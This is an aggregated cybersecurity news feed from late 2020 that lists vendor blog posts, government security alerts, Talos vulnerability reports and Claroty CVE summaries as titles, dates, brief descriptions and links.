Cyber Threat Intelligence (CTI) practitioners can gain insight into adversary operations by tracking conflicts or geopolitical tensions. Similar to a “follow the money” approach in criminal investigations, looking at conflict zones can reveal cyber capabilities deployed as part of events —either by the parties to the conflict itself, or third parties interested in monitoring events for their own purposes.

https://www.first.org/blog/20201214-Current_Events_to_Widespread_Campaigns
Current Events to Widespread Campaigns: Pivoting from Samples to Identify Activity
2020-12-14T17:00:00Z | 1607965200

Cyber Threat Intelligence (CTI) practitioners can gain insight into adversary operations by tracking conflicts or geopolitical tensions. Similar to a “follow the money” approach in criminal investigations, looking at conflict zones can reveal cyber capabilities deployed as part of events —either by the parties to the conflict itself, or third parties interested in monitoring events for their own purposes.

https://www.first.org/blog/20201214-Current_Events_to_Widespread_Campaigns
Reverie: An optimized zero-knowledge proof system
2020-12-14T12:50:27Z | 1607950227

Zero-knowledge proofs, once a theoretical curiosity, have recently seen widespread deployment in blockchain systems such as Zcash and Monero. However, most blockchain applications of ZK proofs make proof size and performance tradeoffs that are a poor fit for other use-cases. In particular, these protocols often require an elaborate trusted setup phase and optimize for proof […]

https://blog.trailofbits.com/2020/12/14/reverie-an-optimized-zero-knowledge-proof-system/
MPLS Upgrade for the Modern Enterprise
2020-12-13T18:08:09Z | 1607882889

If you are about to renew your MPLS contract, or if you need to upgrade your capacity—STOP! Don’t commit to another year of MPLS until you’ve had time to consider if it’s the right technology to carry your business forward. Modern enterprises now have alternatives to MPLS that are more flexible and just as reliable... The post MPLS Upgrade for the Modern Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/mpls-upgrade-for-the-modern-enterprise/
Forrester Webinar: The Path to a Successful WAN Transformation
2020-12-13T13:34:11Z | 1607866451

The post Forrester Webinar: The Path to a Successful WAN Transformation appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-42
Smart DNS: Delivering the Best Subscriber Experience
2020-12-10T05:00:00Z | 1607576400

The presence of public "over-the-top" DNS resolution alternatives is a strong motivator for internet service providers (ISPs) to invest in making their DNS resolution infrastructure the best that it can be. Resolvers are the glue that binds subscribers to their fixed and mobile broadband services.

https://www.akamai.com/blog/performance/smart-dns-delivering-the-best-subscriber-experience
Security Alert (A20-12-03): Vulnerability in Adobe Reader/Acrobat
2020-12-10T04:00:00Z | 1607572800

Security update are released for Adobe Reader and Acrobat to address an input validation vulnerability.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2020-25195
2020-12-10T00:00:00Z | 1607558400

IMPROPER INPUT VALIDATION CWE-20 The length of the affected product's input fields is verified only on the client side when receiving input from the configuration web server, which may allow an attacker to bypass the check and send input to crash the device.

https://claroty.com/team82/disclosure-dashboard/cve-2020-25195
Cyberweek 2020 Attracted Both Online Shoppers and DDoS Attackers
2020-12-09T16:03:00Z | 1607529780

2020 has shown both record-busting bps and pps attacks and the most prolific DDoS extortion campaign recorded by Akamai.

https://www.akamai.com/blog/security/cyberweek-2020-attracted-both-online-shoppers-and-ddos-attackers
Evading Link Scanning Security Services with Passive Fingerprinting
2020-12-09T05:00:00Z | 1607490000

By Gal Bitensky, Executive Summary Link scanners are a critical component in multiple classes of security products including email security suites, websites that suggest direct inspection of a suspicious link, and others. Behind the scenes, these services use web clients...

https://www.akamai.com/blog/security/evading-link-scanning-security-services-with-passive-fingerprinting
Security Alert (A20-12-01): Multiple Vulnerabilities in Microsoft Products (December 2020)
2020-12-09T04:00:00Z | 1607486400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-12-02): Vulnerability in Apache Struts
2020-12-09T04:00:00Z | 1607486400

Apache has released the security bulletin (S2-061) to address a vulnerability in Apache Struts.

https://www.govcert.gov.hk/en/alerts_detail.php
Foxit Reader JavaScript choice field use-after-free vulnerability
2020-12-09T00:00:00Z | 1607472000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1171
Foxit Reader JavaScript remove template use-after-free vulnerability
2020-12-09T00:00:00Z | 1607472000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1181
Foxit Reader Javascript Field fileSelect Use After Free Vulnerability
2020-12-09T00:00:00Z | 1607472000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1166
Foxit Reader JavaScript media openPlayer type confusion vulnerability
2020-12-09T00:00:00Z | 1607472000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1165
Foxit Reader JavaScript choice field format event use-after-free vulnerability
2020-12-09T00:00:00Z | 1607472000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1175
Phishing Summary 2020?Trends and Highlights
2020-12-08T05:00:00Z | 1607403600

2020 was a challenging year for many of us, as the COVID-19 pandemic disrupted life and introduced challenges in almost all elements of living. 2020 was also challenging from a cybersecurity point of view, as nearly the entire workforce moved...

https://www.akamai.com/blog/security/phishing-summary-2020-trends-and-highlights
Can Edge Computing Exist Without the Edge? Part 2: Edge Computing
2020-12-08T05:00:00Z | 1607403600

In part 1 of this series, I drew the architectural distinction between a centralized cloud platform and a distributed edge network. This is an important foundation upon which to explain the difference between cloud computing and edge computing. The two serve very different and complementary purposes. However, in my experience, business leaders, product owners, and application developers often mistake them as competitive.

https://www.akamai.com/blog/edge/can-edge-computing-exist-without-the-edge-part-2-edge-computing
Schneider Electric EcoStruxure Control Expert PLC Simulator Modbus message processing remote code execution vulnerability
2020-12-08T00:00:00Z | 1607385600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1140
Schneider Electric EcoStruxure Control Expert APX project file processing code execution vulnerability
2020-12-08T00:00:00Z | 1607385600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1144
Microsoft Office ElementType code execution vulnerability
2020-12-08T00:00:00Z | 1607385600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1153
CVE-2020-7568
2020-12-08T00:00:00Z | 1607385600

EXPOSURE OF SENSITIVE INFORMATION CWE-200 An exposure of sensitive information to an unauthorized actor vulnerability exists that could allow non-sensitive information disclosure when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller.Read more: Update to Recent Schneider Electric M221 PLC Vulnerabilities

https://claroty.com/team82/disclosure-dashboard/cve-2020-7568
CVE-2020-7567
2020-12-08T00:00:00Z | 1607385600

MISSING ENCRYPTION OF SENSITIVE DATA CWE-311 A missing encryption of sensitive data vulnerability exists that could allow the attacker to find the password hash when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller and has broken the encryption keys.Read more: Update to Recent Schneider Electric M221 PLC Vulnerabilities

https://claroty.com/team82/disclosure-dashboard/cve-2020-7567
CVE-2020-7566
2020-12-08T00:00:00Z | 1607385600

SMALL SPACE OF RANDOM VALUES CWE-334 A small space of random values vulnerability exists that could allow the attacker to break the encryption keys when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller.Read more: Update to Recent Schneider Electric M221 PLC Vulnerabilities

https://claroty.com/team82/disclosure-dashboard/cve-2020-7566
CVE-2020-28214
2020-12-08T00:00:00Z | 1607385600

USE OF A ONE-WAY HASH WITH A PREDICTABLE SALT CWE-760 A use of a one-way hash with a predictable salt vulnerability exists that could allow the attacker to pre-compute the hash value using a dictionary attack, effectively disabling the protection that an unpredictable salt would provide.Read more: Update to Recent Schneider Electric M221 PLC Vulnerabilities

https://claroty.com/team82/disclosure-dashboard/cve-2020-28214
Pay2Key – The Plot Thickens
2020-12-07T17:00:00Z | 1607360400

Last weekend we issued a ransomware alert about a wave of attacks using a never-seen-before strain dubbed ‘Pay2Key.’ Our investigation suggested the ransomware operators were mostly targeting Israeli companies. The ransomware used in the attacks spread rapidly across victims’ networks, leaving significant parts of the network encrypted along with a ransom note, threatening to leak stolen corporate data unless the ransom is paid.

https://www.first.org/blog/20201207-Pay2Key
Pay2Key – The Plot Thickens
2020-12-07T17:00:00Z | 1607360400

Last weekend we issued a ransomware alert about a wave of attacks using a never-seen-before strain dubbed ‘Pay2Key.’ Our investigation suggested the ransomware operators were mostly targeting Israeli companies. The ransomware used in the attacks spread rapidly across victims’ networks, leaving significant parts of the network encrypted along with a ransom note, threatening to leak stolen corporate data unless the ransom is paid.

https://www.first.org/blog/20201207-Pay2Key
Virtual Workspaces vulnerability exploited by malicious cyber actors
2020-12-07T16:32:08Z | 1607358728

The NCSC is supporting an NSA advisory detailing how Russian state-sponsored actors have been exploiting a vulnerability in VMware® products.

https://www.ncsc.gov.uk/news/virtual-workspaces-vulnerability
Distinguishing Among DNS Services Part 2: The Economics
2020-12-07T05:00:00Z | 1607317200

This is Part 2 of a 3-part blog series highlighting some of the distinguishing aspects of Akamai's DNS services, Edge DNS and Global Traffic Management.

https://www.akamai.com/blog/trends/digital-transformation-distinguishing-among-dns-services-part-2
Distinguishing Among DNS Services Part 2: The Economics
2020-12-07T05:00:00Z | 1607317200

This is Part 2 of a three-part blog series highlighting some of the distinguishing aspects of Akamai's Domain Name System (DNS) services, Edge DNS and Global Traffic Management.

https://www.akamai.com/blog/trends/distinguishing-among-dns-services-part-2-the-economics
Introducing the Cato Cloud API: Why We Chose GraphQL over REST
2020-12-06T12:29:48Z | 1607257788

Enterprise and managed service provider (MSP) customers have been asking Cato for an API that would let them use their existing third-party provisioning, ticketing and management systems to run and retrieve data from their Cato deployments. Today, we fulfilled that request with the Cato Cloud API. In doing so, we made the decision to implement... The post Introducing the Cato Cloud API: Why We Chose GraphQL over REST appeared first on Cato Networks.

https://www.catonetworks.com/blog/introducing-the-cato-cloud-api-why-we-chose-graphql-over-rest/
50,000 Fortinet VPNs Breached Via Vulnerability Fixed 18 Months Ago. Here’s What You Can Do.
2020-12-03T08:09:05Z | 1606982945

Last week (25 November 2020) reminded us once again of the importance and challenge of that real-world problem — patching. it was reported `that a hacker had leaked the credentials for 50,000 Fortinet VPNs. The victims include high street banks, telecoms, and government organizations from around the world. The stolen data includes usernames, passwords, access... The post 50,000 Fortinet VPNs Breached Via Vulnerability Fixed 18 Months Ago. Here’s What You Can Do. appeared first on Cato Networks.

https://www.catonetworks.com/blog/50000-fortinet-vpns-breached-via-vulnerability-fixed-18-months-ago-heres-what-you-can-do/
EIP Stack Group OpENer Ethernet/IP server out-of-bounds write vulnerability
2020-12-02T00:00:00Z | 1606867200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1170
EIP Stack Group OpENer ethernet/IP server denial-of-service vulnerability
2020-12-02T00:00:00Z | 1606867200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1143
Eesti riigi IT-taristu vastu toimusid küberrünnakud
2020-12-01T14:30:47Z | 1606833047

Riigi infosüsteemi amet (RIA) tuvastas novembris kolmel erineval juhul sarnase käekirjaga rünnakud Eesti riigi IT-taristu vastu, mille tagajärjel said kurjategijad kätte ka isikuandmeid. Küberrünnakud tabasid Majandus- ja Kommunikatsiooniministeeriumi (MKM), Sotsiaalministeeriumi (SoM) ja Välisministeeriumi (VäM) servereid.

https://ria.ee/uudised/eesti-riigi-it-taristu-vastu-toimusid-kuberrunnakud
How Cato Cloud Resiliency Overcomes Regional and National Outages
2020-12-01T09:11:12Z | 1606813872

Just a day before Thanksgiving, an AWS cloud outage struck down large parts of the Internet for multiple hours, impacting major apps, websites, and services worldwide like Autodesk, Roku, and Shipt. Although only 1 of 23 AWS geographic regions (US-East-1) experienced issues at the time, the global echo was significant for any company dependent on... The post How Cato Cloud Resiliency Overcomes Regional and National Outages appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-cato-cloud-resiliency-overcomes-regional-and-national-outages/
Sagenenud on venekeelsed telefonikõned raha välja petmiseks
2020-11-30T09:44:07Z | 1606729447

Viimastel nädalatel on järjest rohkem juhtumeid, kus vene keelt kõnelev helistaja esitleb end mõne panga klienditeenindajana ja püüab inimestelt raha välja petta.

https://ria.ee/uudised/sagenenud-venekeelsed-telefonikoned-raha-valja-petmiseks
Distinguishing Among DNS Services Part 1: The Platform
2020-11-30T05:00:00Z | 1606712400

This is Part 1 of a 3-part blog series highlighting some of the distinguishing aspects of Akamai's DNS services, Edge DNS and Global Traffic Management.

https://www.akamai.com/blog/trends/distinguishing-among-dns-services-part-1-the-platform
High Threat Security Alert (A20-11-08): Multiple Vulnerabilities in Drupal
2020-11-30T04:00:00Z | 1606708800

Drupal has released a security advisory to address two vulnerabilities in PEAR Archive_Tar library which is used in Drupal Core by default.

https://www.govcert.gov.hk/en/alerts_detail.php
Webkit ImageDecoderGStreamer use-after-free vulnerability
2020-11-30T00:00:00Z | 1606694400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1195
Webkit WebSocket code execution vulnerability
2020-11-30T00:00:00Z | 1606694400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1155
Updates help patch up the vulnerabilities of your smart devices
2020-11-26T14:19:34Z | 1606400374

This is the first entry in the National Cyber Security Centre Finland’s four-part series of articles on vulnerabilities. The inaugural article tackles the causes and prevention of vulnerabilities and discusses what to do when one is identified. The following entries will provide a general overview of vulnerabilities and examine the coordination work of the NCSC-FI as well as vulnerability management at Traficom's partner organisations.

https://www.kyberturvallisuuskeskus.fi/en/news/updates-help-patch-vulnerabilities-your-smart-devices
Updates help patch up the vulnerabilities of your smart devices
2020-11-26T14:19:34Z | 1606400374

This is the first entry in the National Cyber Security Centre Finland’s four-part series of articles on vulnerabilities. The inaugural article tackles the causes and prevention of vulnerabilities and discusses what to do when one is identified. The following entries will provide a general overview of vulnerabilities and examine the coordination work of the NCSC-FI as well as vulnerability management at Traficom's partner organisations.

https://www.kyberturvallisuuskeskus.fi/en/news/updates-help-patch-vulnerabilities-your-smart-devices
Yellow warning concerning the Emotet malware strain no longer in force
2020-11-26T14:16:12Z | 1606400172

Emotet was spread through files attached to emails sent in the name of Finnish organisations. The malware strain is designed to steal information from the targeted organisation, infiltrate its network and even initiate a ransomware attack. The spread of Emotet has slowed down so as to make the warning no longer necessary, but caution should still be exercised when handling email attachments.

https://www.kyberturvallisuuskeskus.fi/en/news/yellow-warning-concerning-emotet-malware-strain-no-longer-force
Yellow warning concerning the Emotet malware strain no longer in force
2020-11-26T14:16:12Z | 1606400172

Emotet was spread through files attached to emails sent in the name of Finnish organisations. The malware strain is designed to steal information from the targeted organisation, infiltrate its network and even initiate a ransomware attack. The spread of Emotet has slowed down so as to make the warning no longer necessary, but caution should still be exercised when handling email attachments.

https://www.kyberturvallisuuskeskus.fi/en/news/yellow-warning-concerning-emotet-malware-strain-no-longer-force
Updating vulnerable systems - Race against exploitation
2020-11-26T08:12:22Z | 1606378342

"Update now", an obvious instruction to many administrators. Repeated often enough, it may sound dull and tiresome. How acute is it really to install critical updates?

https://www.kyberturvallisuuskeskus.fi/en/news/updating-vulnerable-systems-race-against-exploitation
Updating vulnerable systems - Race against exploitation
2020-11-26T08:12:22Z | 1606378342

"Update now", an obvious instruction to many administrators. Repeated often enough, it may sound dull and tiresome. How acute is it really to install critical updates?

https://www.kyberturvallisuuskeskus.fi/en/news/updating-vulnerable-systems-race-against-exploitation
High-fidelity build instrumentation with blight
2020-11-25T14:38:10Z | 1606315090

TL;DR: We’re open-sourcing a new framework, blight, for painlessly wrapping and instrumenting C and C++ build tools. We’re already using it on our research projects, and have included a set of useful actions. You can use it today for your own measurement and instrumentation needs: Why would you ever want to wrap a build tool? […]

https://blog.trailofbits.com/2020/11/25/high-fidelity-build-instrumentation-with-blight/
SDP/ZTNA vs. VPN
2020-11-24T14:34:16Z | 1606228456

Once Upon a VPN…  In today’s challenging reality, remote access has become a basic requirement for businesses of all kinds, sizes, and locations. An enterprise’s ability to shift to a work-from-anywhere model instantly, securely, and at scale, will determine how it will weather the COVID-19 crisis. A common way to provide remote access is with... The post SDP/ZTNA vs. VPN appeared first on Cato Networks.

https://www.catonetworks.com/blog/sdp-vs-vpn/
Smart (and simple) ways to prevent symlink attacks in Go
2020-11-24T13:00:04Z | 1606222804

After writing Go for years, many of us have learned the error-checking pattern down to our bones: “Does this function return an error? Ope, better make sure it’s nil before moving on.” And that’s great! This should be our default behavior when writing Go. However, rote error checking can sometimes prevent critical thinking about what […]

https://blog.trailofbits.com/2020/11/24/smart-and-simple-ways-to-prevent-symlink-attacks-in-go/
Oktoober Eesti küberruumis: Emoteti pahavara levik pole raugenud
2020-11-24T10:55:02Z | 1606215302

Eesti küberruumis toimuvat jälgiv ja analüüsiv Riigi Infosüsteemi Amet registreeris möödunud kuul 279 küberintsidenti. Juhtumite arv kasvas suuresti Emoteti pahavara leviku tõttu, mille levik pole endiselt raugenud. Lisaks kasutati Eesti ettevõtte serverit USA valijatele ähvarduskirjade saatmiseks ning finantsasutust tabas teenustõkestusrünnak.

https://ria.ee/uudised/oktoober-eesti-kuberruumis-emoteti-pahavara-levik-pole-raugenud
CVE-2020-27255
2020-11-24T00:00:00Z | 1606176000

HEAP-BASED BUFFER OVERFLOW CWE-122 A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send malicious set attribute requests, which could result in the leaking of sensitive information. This information disclosure could lead to the bypass of address space layout randomization (ASLR).

https://claroty.com/team82/disclosure-dashboard/cve-2020-27255
CVE-2020-27253
2020-11-24T00:00:00Z | 1606176000

IMPROPER INPUT VALIDATION CWE-20 A flaw exists in the Ingress/Egress checks routine of FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to specifically craft a malicious packet resulting in a denial-of-service condition on the device.

https://claroty.com/team82/disclosure-dashboard/cve-2020-27253cve-2020-27251cve-2020-27255
CVE-2020-27251
2020-11-24T00:00:00Z | 1606176000

HEAP-BASED BUFFER OVERFLOW CWE-122 A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send malicious port ranges, which could result in remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2020-27251
Answering the Top Questions About SASE Asked by IT Professionals
2020-11-23T10:21:16Z | 1606126876

The post Answering the Top Questions About SASE Asked by IT Professionals appeared first on Cato Networks.

https://www.catonetworks.com/resources/answering-the-top-questions-about-sase-asked-by-it-professionals/
Using LL-HLS with Byte-Range Addressing to Achieve Interoperability in Low Latency Streaming
2020-11-23T08:00:00Z | 1606118400

HTTP Adaptive Segmented (HAS) streaming began to be used at scale from 2008 to 2012, with the advent of Move Networks, Microsoft Smooth Streaming, Apple HLS, Adobe HDS, and MPEG DASH. With the typical 10s segment durations of the day, livestream latencies (measuring latency as the time from an action being filmed to that same action being displayed on a device's screen) remained in the 30s to 60s range, trailing broadcast by a significant degree.

https://www.akamai.com/blog/performance/-using-ll-hls-with-byte-range-addressing-to-achieve-interoperabi
Don't Let DDoS Extortionists Deliver a KO Punch
2020-11-20T19:14:00Z | 1605899640

Since mid-August, a variety of threat actors (and copycats alike) have been targeting organizations across all industries globally, threatening impending DDoS attacks unless Bitcoin is paid out. It's apparent, as the campaign rages on, that some businesses must be paying the extortion demands, -- incentivizing the criminal activity. Others are procuring emergency DDoS defenses in order to withstand bandwidth-busting attacks and keep internet-facing infrastructure protected. As highlighted in our last blog, we've been busy ramping customers on to our DDoS mitigation platforms for rapid protection before the threat actors strike again. And based on recent activity, they desire a rematch.

https://www.akamai.com/blog/security/don-t-let-ddos-extortionists-deliver-a-ko-punch
WordPress Malware Setting Up SEO Shops
2020-11-20T05:00:00Z | 1605848400

While recently looking over my honeypots, I discovered an infection where a malicious actor added a storefront on top of my existing WordPress installation. For background, this particular honeypot is a full instance of WordPress running on a Docker image....

https://www.akamai.com/blog/security/wordpress-malware-setting-up-seo-shops
Security Alert (A20-11-07): Vulnerability in Drupal
2020-11-19T04:00:00Z | 1605758400

Drupal has released a security advisory to address a vulnerability of improper sanitisation of filenames on uploaded files in Drupal Core.

https://www.govcert.gov.hk/en/alerts_detail.php
Toward Inclusive Language in Software
2020-11-18T17:30:00Z | 1605720600

https://www.akamai.com/blog/culture/toward-inclusive-language-in-software
Lightning storms, rainy spells and occasional sunlight made for volatile cyber weather in October
2020-11-18T07:55:24Z | 1605686124

A lightning storm swept over Finland's cyber skies in October as the personal information of tens of thousands of people was leaked online following a major data breach. Scams and phishing incidents once again made for grey skies, with more rain forecasted. Sporadic sunlight came in the form of the European Cybersecurity Month, which highlighted the importance of information security skills.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa-lokakuu-2020
Lightning storms, rainy spells and occasional sunlight made for volatile cyber weather in October
2020-11-18T07:55:24Z | 1605686124

A lightning storm swept over Finland's cyber skies in October as the personal information of tens of thousands of people was leaked online following a major data breach. Scams and phishing incidents once again made for grey skies, with more rain forecasted. Sporadic sunlight came in the form of the European Cybersecurity Month, which highlighted the importance of information security skills.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa-lokakuu-2020
Future questions, cooperation and the responsibilities of management sparked discussion at the Information Security 2020 seminar
2020-11-18T07:30:46Z | 1605684646

The 2020 edition of the annual information security seminar organised by the National Cyber Security Centre Finland at the Finnish Transport and Communications Agency Traficom and the National Emergency Supply Agency was held as a virtual event. The central themes discussed were trust, cooperation and the responsibility of corporate boards.

https://www.kyberturvallisuuskeskus.fi/en/news/future-questions-cooperation-and-responsibilities-management-sparked-discussion-information
Future questions, cooperation and the responsibilities of management sparked discussion at the Information Security 2020 seminar
2020-11-18T07:30:46Z | 1605684646

The 2020 edition of the annual information security seminar organised by the National Cyber Security Centre Finland at the Finnish Transport and Communications Agency Traficom and the National Emergency Supply Agency was held as a virtual event. The central themes discussed were trust, cooperation and the responsibility of corporate boards.

https://www.kyberturvallisuuskeskus.fi/en/news/future-questions-cooperation-and-responsibilities-management-sparked-discussion-information
Security Alert (A20-11-06): Multiple Vulnerabilities in Firefox
2020-11-18T04:00:00Z | 1605672000

Mozilla has published two security advisories (MFSA 2020-50 and MFSA 2020-51) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
CSIRTs: Al pie del canón
2020-11-18T00:00:00Z | 1605657600

Los equipos de respuesta a incidentes de seguridad necieron tras el considerado primer gran ciberataque mundial, provocado por el 'virus Moris', en 1988.

https://www.first.org/newsroom/releases/20201118
CSIRTs: Al pie del canón
2020-11-18T00:00:00Z | 1605657600

Los equipos de respuesta a incidentes de seguridad necieron tras el considerado primer gran ciberataque mundial, provocado por el 'virus Moris', en 1988.

https://www.first.org/newsroom/releases/20201118
Cato. Ready for Whatever’s Next
2020-11-17T12:25:57Z | 1605615957

Today, Cato has announced our largest round to date at $130M and reached a valuation of $1B (pre). I want to take this opportunity to cover several highlights of our journey-to-date and how we see the way forward. Cloud Service vs. Point Products In 2015, the cloud disruption was already in full swing. The applications... The post Cato. Ready for Whatever’s Next appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ready-for-whatevers-next/
Migrating your Datacenter Firewall to the Cloud
2020-11-17T11:32:20Z | 1605612740

The post Migrating your Datacenter Firewall to the Cloud appeared first on Cato Networks.

https://www.catonetworks.com/resources/migrating-your-datacenter-firewall-to-the-cloud/
ProcessMaker sort parameter multiple SQL Injection Vulnerabilities
2020-11-17T00:00:00Z | 1605571200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1126
CVE-2020-25159
2020-11-17T00:00:00Z | 1605571200

STACK-BASED BUFFER OVERFLOW CWE-121 The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to send a specially crafted packet that may result in a denial-of-service condition or code execution. Read more: Lingering RTA ENIP Stack Vulnerability Poses Risk to ICS Devices

https://claroty.com/team82/disclosure-dashboard/cve-2020-25159
The dangers of firewall misconfigurations
2020-11-16T20:27:00Z | 1605558420

https://www.akamai.com/blog/security/the-dangers-of-firewall-misconfigurations-and-how-to-avoid-them
Eakad saavad aasta lõpuni küberturvalisuse nõu infoliinilt
2020-11-16T14:33:06Z | 1605537186

Riigi Infosüsteemi Amet (RIA) keskendub koos partneritega küberteadlikkuse tõstmisele venekeelsete vanemaealiste seas, kes ei ole internetiohtudest nii hästi informeeritud.

https://ria.ee/uudised/eakad-saavad-aasta-lopuni-kuberturvalisuse-nou-infoliinilt
Safeguard Identity Data at the Source
2020-11-16T14:00:00Z | 1605535200

When your customers create an account on your website or application, they are entrusting their valuable information with you in order to establish a relationship. To maintain that relationship, they need to have faith that you will protect their information.

https://www.akamai.com/blog/security/safeguard-identity-data-at-the-source
Top 15 Network Security Websites
2020-11-16T06:25:27Z | 1605507927

Network security covers many different areas, including access control, cloud security, malware protection, BYOD security, remote workforce, and web security. The modern digital business of any size, industry, or location needs to keep up with all these responsibilities to maintain a strong security posture. So we gathered a list of 15 websites (listed alphabetically) to... The post Top 15 Network Security Websites appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-15-network-security-websites/
The elephant in the data centre
2020-11-13T10:15:17Z | 1605262517

A new white paper from the NCSC explains the potential benefits of adopting a cloud-system.

https://www.ncsc.gov.uk/blog-post/the-elephant-in-the-data-centre
Akamai Wellness in APJ
2020-11-13T05:00:00Z | 1605243600

Creating the world's best and most secure digital experience demands the very best industry talent. But as a responsible employer, we also understand how important it is to play our part in looking after those brilliant minds.

https://www.akamai.com/blog/culture/akamai-wellness-in-apj
FIRST sees over 1600 cybersecurity professionals from 97 countries sign up for 32nd Annual Conference
2020-11-13T00:00:00Z | 1605225600

Virtual Conference to take place November 16-18 2020

https://www.first.org/newsroom/releases/20201113
FIRST sees over 1600 cybersecurity professionals from 97 countries sign up for 32nd Annual Conference
2020-11-13T00:00:00Z | 1605225600

Virtual Conference to take place November 16-18 2020

https://www.first.org/newsroom/releases/20201113
Security Alert (A20-11-05): Multiple Vulnerabilities in Palo Alto PAN-OS
2020-11-12T04:00:00Z | 1605153600

Palo Alto has published security advisories to address multiple vulnerabilities in PAN-OS.

https://www.govcert.gov.hk/en/alerts_detail.php
Pixar OpenUSD SDF layer path remote code execution
2020-11-12T00:00:00Z | 1605139200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1145
Pixar OpenUSD binary file format compressed sections code execution vulnerabilities
2020-11-12T00:00:00Z | 1605139200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1094
Pixar OpenUSD binary file format offset seek information leak vulnerability
2020-11-12T00:00:00Z | 1605139200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1104
Pixar OpenUSD Binary File Format Compressed Value Reps Code Execution Vulnerabilities
2020-11-12T00:00:00Z | 1605139200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1101
Pixar OpenUSD Binary File Format Decompressed Path Rebuilding Memory corruption
2020-11-12T00:00:00Z | 1605139200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1120
Pixar OpenUSD binary file format specs memory corruption
2020-11-12T00:00:00Z | 1605139200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1125
Pixar OpenUSD Binary File Format Token Strings Information Leak Vulnerability
2020-11-12T00:00:00Z | 1605139200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1103
Pixar OpenUSD binary file format index type values information leak vulnerability
2020-11-12T00:00:00Z | 1605139200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1105
CVE-2020-25165
2020-11-12T00:00:00Z | 1605139200

CWE-287: IMPROPER AUTHENTICATION The affected products are vulnerable to a network session authentication vulnerability within the authentication process between specified versions of the BD Alaris PC Unit and the BD Alaris Systems Manager. If exploited, an attacker could perform a denial-of-service attack on the BD Alaris PC Unit by modifying the configuration headers of data in transit. A denial-of-service attack could lead to a drop in the wireless capability of the BD Alaris PC Unit, resulting in manual operation of the PC Unit.

https://claroty.com/team82/disclosure-dashboard/cve-2020-25165
Redundant, Secure, and Open Short Domains: A Vision for Multi-Provider Apex Domain Aliases to Enable DNS Diversity
2020-11-11T16:44:00Z | 1605113040

Human nature is to seek simpler and convenient ways to do things. One example is the sometimes onerous task of typing a URL into a web browser's address bar. Since users prefer short, easy-to-remember URLs, an internet trend is to use short domains for websites (e.g., edgedns.zone). With short website names, users benefit from the convenience of fewer characters to remember and type.

https://www.akamai.com/blog/security/redundant--secure--and-open-short-domains--a-vision-for-multi-pr
The Dark Side of SD-WAN
2020-11-11T13:23:30Z | 1605101010

The post The Dark Side of SD-WAN appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-39
High Threat Security Alert (A20-11-04): Multiple Vulnerabilities in Microsoft Products (November 2020)
2020-11-11T04:00:00Z | 1605067200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
SASE: It’s the iPhone of Networking
2020-11-10T12:12:13Z | 1605010333

When the Apple iPhone hit the market in 2007, it was described as “revolutionary.” The monumental success of the iPhone – and countless imitators from other smartphone vendors – has proven the term to be correct. But why? What’s the big innovation of the smartphone? After all, the components in a smartphone predated this type... The post SASE: It’s the iPhone of Networking appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-its-the-iphone-of-networking/
A New Skimmer Uses WebSockets and a Fake Credit Card Form to Steal Sensitive Data
2020-11-10T05:00:00Z | 1604984400

A new skimmer attack was discovered this week, targeting various online e-commerce sites built with different frameworks. As I write this blog post, the attack is still active and exfiltrating data.

https://www.akamai.com/blog/security/a-new-skimmer-uses-websockets-and-a-fake-credit-card-form-to-steal-sensitive-data
Security Alert (A20-11-03): Vulnerability in Firefox
2020-11-10T04:00:00Z | 1604980800

Mozilla has published a security advisory (MFSA 2020-49) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
LogicalDoc installation privilege escalation vulnerability
2020-11-10T00:00:00Z | 1604966400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1154
CVE-2020-7565
2020-11-10T00:00:00Z | 1604966400

INADEQUATE ENCRYPTION STRENGTH CWE-326 An inadequate encryption strength vulnerability exists that could allow the attacker to break the encryption key when the attacker has captured the traffic between EcoStruxure Machine - Basic software and Modicon M221 controller. Read more: Update to Recent Schneider Electric M221 PLC Vulnerabilities

